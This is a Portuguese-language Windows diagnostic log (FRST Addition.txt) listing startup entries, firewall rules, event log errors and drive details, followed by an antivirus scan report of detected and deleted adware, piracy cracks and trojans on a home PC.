HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\StartupFolder: => "Enviar para o OneNote.lnk"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "Facebook Update"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "GoogleDriveSync"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "Lingoes"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "GUDelayStartup"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "DIMBaixando a sua atualização...1461778623064"
HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\StartupApproved\Run: => "DIMBaixando a sua atualização...1464359625886"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{213698C8-FFF1-492C-9529-C37113A100F2}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{FC11C78D-A7CF-47CC-A986-8448C78062E2}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{1C707205-8C98-4FA9-A61D-BD6D36C0DC38}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{001D99E8-54CB-4D39-8BAB-AB9B1F367F0A}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpse.exe
FirewallRules: [{E58192B0-3A2E-4132-AC5B-DFBCE7FBCBCF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpsapp.exe
FirewallRules: [{8E5481A3-B648-47FC-9F06-DADDAD9A5ED1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqsudi.exe
FirewallRules: [{C2E06CF5-AB57-447C-863F-F63DDB58AEA7}] => (Allow) C:\Program Files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe
FirewallRules: [{38C2EFF4-61C3-4CA8-872F-2CE269D097D8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{53AFEAAE-FD29-4772-9705-C039A4B43A86}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{59D09862-2BF1-4525-A454-45489CA6191B}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{6C7824E2-25C3-433D-BDB0-E967C5934BDB}] => (Block) c:\Program Files\Corel\CorelDRAW Graphics Suite X8\Programs64\CorelPP.exe
FirewallRules: [{7F8513DA-EF16-496C-BC9E-51178FD7D957}] => (Block) c:\Program Files\Corel\CorelDRAW Graphics Suite X8\Programs64\CorelDrw.exe
FirewallRules: [{DA0962E3-7721-406F-8EC4-1187098087AB}] => (Block) C:\program files (x86)\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{5F88E345-9467-4E30-9BC6-7CF549AA1AA2}] => (Block) C:\program files (x86)\pro evolution soccer 2016\pes2016.exe
FirewallRules: [UDP Query User{4757F803-7002-4EA0-A191-F31FC076B50F}C:\program files (x86)\pro evolution soccer 2016\pes2016.exe] => (Allow) C:\program files (x86)\pro evolution soccer 2016\pes2016.exe
FirewallRules: [TCP Query User{A3520914-02DC-4D25-AC98-6DB3EF9AB60A}C:\program files (x86)\pro evolution soccer 2016\pes2016.exe] => (Allow) C:\program files (x86)\pro evolution soccer 2016\pes2016.exe
FirewallRules: [{91A1C6BE-B74A-4038-AAD1-DBF24CB721BC}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{806B9453-8229-4A59-9ECE-81D5648B8D90}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{3169B6AA-3C80-4CF1-A173-936EB301C952}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{F470DA09-D203-4ADD-83F9-CF2537A94E73}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B1C89579-DAB7-42BD-BDC2-8A0D0DE4A8B3}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{22BD7D85-3404-4F22-BCC1-CB930AD307A4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A3F0EB37-6F3E-4D2A-94B8-147541CF8C22}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2FE97BB6-A84B-4601-BC46-F648E2507F0D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [UDP Query User{AFC87E4E-5260-4F65-BF2D-7BBA46E81FE2}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [TCP Query User{8D10D1E3-DDA6-4C1E-BF16-37B56415F02C}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{8A9F2A50-E60E-43F6-8BE1-67CA640E57D5}] => (Allow) C:\Users\Helder\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{F8C486E6-26E4-416E-99B0-B6233FA1682B}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{E3C342AC-902A-40BD-AAEF-86E0576F4B93}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{23C56E0E-1A10-4426-A45F-E47D0D5AB030}] => (Allow) C:\Users\Helder\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{C64A027F-7BC9-4564-996E-A76657EE9FC9}] => (Allow) C:\Users\Helder\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FABBE1E4-5310-4941-92B4-C2A4E40FE9E1}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{9249BF67-F6FF-4372-8B4E-FEFD022A0059}] => (Allow) LPort=2869
FirewallRules: [{9D36AA82-8696-4831-942E-E7DDE8CC468D}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{8241A615-3091-483E-94E2-33B5B0AF71FF}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [UDP Query User{F46708CA-A284-4004-AC16-3A997B1A2690}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [TCP Query User{662B64D4-CD1D-40A0-884E-06BF27AD678B}C:\program files (x86)\pro evolution soccer 2015\pes2015.exe] => (Allow) C:\program files (x86)\pro evolution soccer 2015\pes2015.exe
FirewallRules: [UDP Query User{25966621-5FA2-44CF-BB25-41B3EE47F347}C:\program files (x86)\pro evolution soccer 2015\pes2015.exe] => (Allow) C:\program files (x86)\pro evolution soccer 2015\pes2015.exe
FirewallRules: [{B3606CF4-5D6B-49B0-82F4-E831A97B5644}] => (Block) C:\program files (x86)\pro evolution soccer 2015\pes2015.exe
FirewallRules: [{5A2DC540-4932-45A4-A250-10B72F033885}] => (Block) C:\program files (x86)\pro evolution soccer 2015\pes2015.exe
FirewallRules: [{CC8453E0-5865-4013-BC42-F709B5B22A43}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{65558B97-902C-4273-BCD0-48EFCAD02BC3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{26121931-09B9-4F2B-A6B4-681550B0A6C2}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{4466A995-B632-4238-B951-F97CE4EE4DC2}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{96A3D69C-B5BE-4C9E-AC88-A13B522EAEC7}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{FA656356-0FBC-4699-B932-E93C07E8D61C}] => (Allow) C:\Windows\[email]KMS-R@1n.exe[/email]
FirewallRules: [{87C126B9-724F-4A41-ABB4-A056AD621254}] => (Allow) C:\Windows\[email]KMS-R@1n.exe[/email]
FirewallRules: [TCP Query User{DCD61703-AF9B-4174-ADE2-4CF09CCD0CAA}C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{B0E48C38-703E-4CC8-9441-604AC46A526B}C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{D96B83DD-985A-4DD7-8B48-4F942B860C06}] => (Block) C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{ADD875E2-1149-492B-AA6A-42A4DB06FE5F}] => (Block) C:\program files\windowsapps\xbmcfoundation.kodi_16.9.904.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{CC40DCAB-9D96-4A32-9537-B010E1591CBA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{B2F79DAA-43C0-447A-94BB-DE2951A6E57F}C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [UDP Query User{5AA41813-7334-48E4-9061-E33C55FD74A4}C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe] => (Allow) C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{4684ED75-DA98-4A13-82B4-48DA7075E503}] => (Block) C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{7ECA4D72-1357-47E5-99C1-E79F0694AC2D}] => (Block) C:\program files\windowsapps\xbmcfoundation.kodi_17.0.901.0_x86__4n2hpmxwrvr6p\kodi.exe
FirewallRules: [{C5A40E9A-9EA8-40D6-A625-BE1736E37734}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{91429A72-F937-4A53-B73D-1E4AD88820AB}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{5BFFCE34-EA1A-4000-A4D4-3A6EB0B7FCD5}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{6A8270D8-ABA2-471B-B216-177DDB91081A}] => (Allow) LPort=1688
FirewallRules: [{16343333-05CF-4DBB-B071-3AD2EB1DC6D0}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{A4836C4D-7B9A-4B88-AEE3-493CEFB0CD50}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
==================== Pontos de Restauração =========================
02-03-2017 18:01:55 Installed Recovery for Word 5.0.19634.2 Demo License
14-03-2017 15:49:25 Windows Update
20-03-2017 09:54:41 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============

==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (03/22/2017 07:53:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: Explorer.EXE, versão: 10.0.14393.953, carimbo de data/hora: 0x58ba5aa4
Nome do módulo com falha: settingsynccore.dll, versão: 10.0.14393.953, carimbo de data/hora: 0x58ba59b2
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000010118
ID do processo com falha: 0x2914
Hora de início do aplicativo com falha: 0x01d2a35e3960d4fa
Caminho do aplicativo com falha: C:\WINDOWS\Explorer.EXE
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\settingsynccore.dll
ID do Relatório: f109610a-4d8d-4e7e-90ba-d89eedfa006e
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:
Error: (03/22/2017 07:49:56 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Falha no Procedimento Open para o serviço "BITS" na DLL "C:\Windows\System32\bitsperf.dll". Os dados de desempenho para este serviço não estarão disponíveis. Os primeiros quatro bytes (DWORD) da seção de Dados contêm o código do erro.
Error: (03/22/2017 07:48:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: Service_KMS.exe, versão: 16.0.0.4, carimbo de data/hora: 0x55d0b93a
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.14393.953, carimbo de data/hora: 0x58ba59e1
Código de exceção: 0xe0434352
Deslocamento da falha: 0x0000000000017788
ID do processo com falha: 0xa20
Hora de início do aplicativo com falha: 0x01d2a318d28ef01e
Caminho do aplicativo com falha: C:\Program Files\KMSpico\Service_KMS.exe
Caminho do módulo com falha: C:\WINDOWS\System32\KERNELBASE.dll
ID do Relatório: f1a5e1cf-fee2-4410-9b6a-0638ecf5a198
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:
Error: (03/22/2017 07:47:56 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplicativo: Service_KMS.exe
Versão do Framework: v4.0.30319
Descrição: O processo foi terminado devido a uma exceção sem tratamento.
Informações da Exceção: System.UnauthorizedAccessException
em System.IO.__Error.WinIOError(Int32, System.String)
em System.IO.FileStream.Init(System.String, System.IO.FileMode, System.IO.FileAccess, Int32, Boolean, System.IO.FileShare, Int32, System.IO.FileOptions, SECURITY_ATTRIBUTES, System.String, Boolean, Boolean, Boolean)
em System.IO.FileStream..ctor(System.String, System.IO.FileMode, System.IO.FileAccess, System.IO.FileShare, Int32, System.IO.FileOptions, System.String, Boolean, Boolean, Boolean)
em System.IO.File.InternalReadAllBytes(System.String, Boolean)
em Service_KMS.EmbeddedAssembly.ᜀ(System.String ByRef, System.String ByRef, Service_KMS.Activador.Variables ByRef)
em ᝎ.ᜀ(Service_KMS.Activador.Variables ByRef)
em ᝊ.ᜃ(Service_KMS.Activador.Variables ByRef, Service_KMS.Activador.HostServer ByRef)
em ᝊ.ᜀ(Service_KMS.Activador.Variables ByRef, Service_KMS.Activador.HostServer ByRef)
em ᝑ.ᜀ(Service_KMS.Activador.Variables ByRef, Service_KMS.Activador.WMI.SoftwareLicensingProduct ByRef, System.String ByRef, Boolean ByRef, Boolean ByRef, Boolean ByRef, System.Collections.Generic.List`1 ByRef)
em ᝑ.ᜀ(Service_KMS.Activador.Variables ByRef, System.Collections.Generic.List`1 ByRef)
em Service_KMS.Activador.Activador.ᜁ(Service_KMS.Activador.Variables ByRef)
em ᝑ.ᜀ(Service_KMS.Activador.Variables ByRef, Service_KMS.Activador.WMI.SoftwareLicensingProduct ByRef, System.String ByRef, Boolean ByRef, Boolean ByRef, Boolean ByRef, System.Collections.Generic.List`1 ByRef)
em ᝑ.ᜀ(Service_KMS.Activador.Variables ByRef, System.Collections.Generic.List`1 ByRef)
em Service_KMS.Activador.Activador.ᜁ(Service_KMS.Activador.Variables ByRef)
em System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
em System.Threading.ThreadHelper.ThreadStart()
Error: (03/22/2017 11:40:56 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004F050
Pkey Parcial=9BQHQ
ACID=?
Erro Detalhado[?]
Error: (03/22/2017 11:32:13 AM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Falha na instalação do Comprovante da Compra. 0xC004F050
Pkey Parcial=9BQHQ
ACID=?
Erro Detalhado[?]
Error: (03/22/2017 11:30:16 AM) (Source: KMS-QAD) (EventID: 1001) (User: )
Description: Event-ID 1001
Error: (03/22/2017 04:20:51 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (03/21/2017 11:59:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: AutoPico.exe, versão: 15.0.0.4, carimbo de data/hora: 0x55d0b939
Nome do módulo com falha: KERNELBASE.dll, versão: 10.0.14393.953, carimbo de data/hora: 0x58ba59e1
Código de exceção: 0xe0434352
Deslocamento da falha: 0x0000000000017788
ID do processo com falha: 0x301c
Hora de início do aplicativo com falha: 0x01d2a2b841bfa2d5
Caminho do aplicativo com falha: C:\Program Files\KMSpico\AutoPico.exe
Caminho do módulo com falha: C:\WINDOWS\System32\KERNELBASE.dll
ID do Relatório: 17e3b378-6af1-4fe6-95f0-19623ec518b8
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:
Error: (03/21/2017 11:59:54 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplicativo: AutoPico.exe
Versão do Framework: v4.0.30319
Descrição: O processo foi terminado devido a uma exceção sem tratamento.
Informações da Exceção: System.UnauthorizedAccessException
em System.IO.__Error.WinIOError(Int32, System.String)
em System.IO.FileStream.Init(System.String, System.IO.FileMode, System.IO.FileAccess, Int32, Boolean, System.IO.FileShare, Int32, System.IO.FileOptions, SECURITY_ATTRIBUTES, System.String, Boolean, Boolean, Boolean)
em System.IO.FileStream..ctor(System.String, System.IO.FileMode, System.IO.FileAccess, System.IO.FileShare, Int32, System.IO.FileOptions, System.String, Boolean, Boolean, Boolean)
em System.IO.File.InternalReadAllBytes(System.String, Boolean)
em AutoPico.EmbeddedAssembly.ᜀ(System.String ByRef, System.String ByRef, AutoPico.Activador.Variables ByRef)
em ᜆ.ᜀ(AutoPico.Activador.Variables ByRef)
em ᜂ.ᜃ(AutoPico.Activador.Variables ByRef, AutoPico.Activador.HostServer ByRef)
em ᜂ.ᜀ(AutoPico.Activador.Variables ByRef, AutoPico.Activador.HostServer ByRef)
em ᜉ.ᜀ(AutoPico.Activador.Variables ByRef, AutoPico.Activador.WMI.SoftwareLicensingProduct ByRef, System.String ByRef, Boolean ByRef, Boolean ByRef, Boolean ByRef, System.Collections.Generic.List`1 ByRef)
em ᜉ.ᜀ(AutoPico.Activador.Variables ByRef, System.Collections.Generic.List`1 ByRef)
em AutoPico.Activador.Activador.ᜁ(AutoPico.Activador.Variables ByRef)
em System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
em System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
em System.Threading.ThreadHelper.ThreadStart()

Erros de Sistema:
=============
Error: (03/22/2017 07:51:52 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Detecção de Serviços Interativos terminou com o erro:
Função incorreta.
Error: (03/22/2017 07:50:02 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (03/22/2017 07:48:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço Service KMSELDI foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (03/22/2017 07:47:01 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (03/22/2017 11:40:29 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (03/22/2017 11:35:06 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Install Service(FirefoxDL) devido ao seguinte erro:
O sistema não pode encontrar o arquivo especificado.
Error: (03/22/2017 11:35:01 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço BoxfatSU devido ao seguinte erro:
O sistema não pode encontrar o arquivo especificado.
Error: (03/22/2017 11:34:13 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço BepatSU devido ao seguinte erro:
O sistema não pode encontrar o arquivo especificado.
Error: (03/22/2017 11:33:53 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (03/22/2017 11:30:48 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.

CodeIntegrity:
===================================
Date: 2017-03-14 15:56:01.555
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-03-14 15:56:01.113
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-03-14 10:36:42.188
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.
Date: 2017-03-14 10:36:42.188
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.
Date: 2017-01-25 11:29:39.966
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-01-25 11:29:39.257
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-12-07 17:37:35.492
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.
Date: 2016-12-07 17:37:35.492
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.
Date: 2016-12-07 17:37:27.932
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.
Date: 2016-12-07 17:37:27.931
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Diebold\Warsaw\wslbdhm64.dll that did not meet the Store signing level requirements.

==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz
Percentagem de memória em uso: 54%
RAM física total: 3993.09 MB
RAM física disponível: 1814.54 MB
Virtual Total: 5657.09 MB
Virtual disponível: 3413.46 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:343.93 GB) (Free:95.87 GB) NTFS
Drive e: (Pen Drive - Helder) (Removable) (Total:7.47 GB) (Free:1.8 GB) NTFS
Drive f: (Arquivos Helder) (Fixed) (Total:343.29 GB) (Free:25.64 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 816A20D3)
Partition: GPT.
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Fim de Addition.txt ============================

C:\Program Files\KMSpico\AutoPico.exe a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application cleaned by deleting
C:\Program Files\KMSpico\KMSELDI.exe a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application cleaned by deleting
C:\Program Files\KMSpico\Service_KMS.exe a variant of MSIL/HackTool.IdleKMS.E potentially unsafe application cleaned by deleting (after the next restart)
C:\Program Files (x86)\Legendas-3.5\nfregdrv.exe Win32/RiskWare.NetFilter.V application cleaned by deleting
C:\Program Files (x86)\PDF Creator\message.exe a variant of Win32/SweetIM.B potentially unwanted application cleaned by deleting
C:\Users\Helder\AppData\Local\Temp\~bk927E.tmp multiple threats,Win32/Adware.ELEX.HT application,Win32/Adware.ELEX.HY application,Win32/Adware.ELEX.HS application deleted
C:\Users\Helder\AppData\Local\Temp\3CA4CC09-328F-40AA-9CD7-B786222F011E\isr.msi a variant of Win32/Adware.ELEX.HD application deleted
C:\Users\Helder\AppData\Local\Temp\nsnB130.tmp\brh.dll a variant of Win32/RiskWare.HistoryChecker.J application cleaned by deleting
C:\Users\Helder\AppData\Local\Temp\RarSFX0\keygen.bat Win32/Talmad.F trojan cleaned by deleting
C:\Users\Helder\AppData\Local\Temp\RarSFX1\keygen.bat Win32/Talmad.F trojan cleaned by deleting
C:\Users\Helder\AppData\Roaming\BitTorrent\updates\7.9.1_30739.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application cleaned by deleting
C:\Users\Helder\AppData\Roaming\KastorAllVideoDownloader\setup_allvideodownloader.exe a variant of Win32/OpenCandy.A potentially unsafe application cleaned by deleting
C:\Users\Helder\Desktop\svd3.exe a variant of Win32/Toolbar.Softomate.A potentially unwanted application cleaned by deleting
C:\Users\Helder\Downloads\DiagnosticoBB (1).exe a variant of Win32/Spy.Banker.ACPJ trojan cleaned by deleting
C:\Users\Helder\Downloads\Legendas36.mlu multiple threats,Win32/RiskWare.NetFilter.V application,a variant of Win64/NetFilter.A potentially unsafe application,a variant of Win32/NetFilter.A potentially unsafe application deleted
C:\Users\Helder\Downloads\Legendas36.zip multiple threats,Win32/RiskWare.NetFilter.V application,a variant of Win64/NetFilter.A potentially unsafe application,a variant of Win32/NetFilter.A potentially unsafe application deleted
C:\Users\Helder\Downloads\PDFCreator-1_7_3_setup.exe Win32/InstallMonetizer.AQ potentially unwanted application,Win32/OpenCandy potentially unsafe application cleaned by deleting
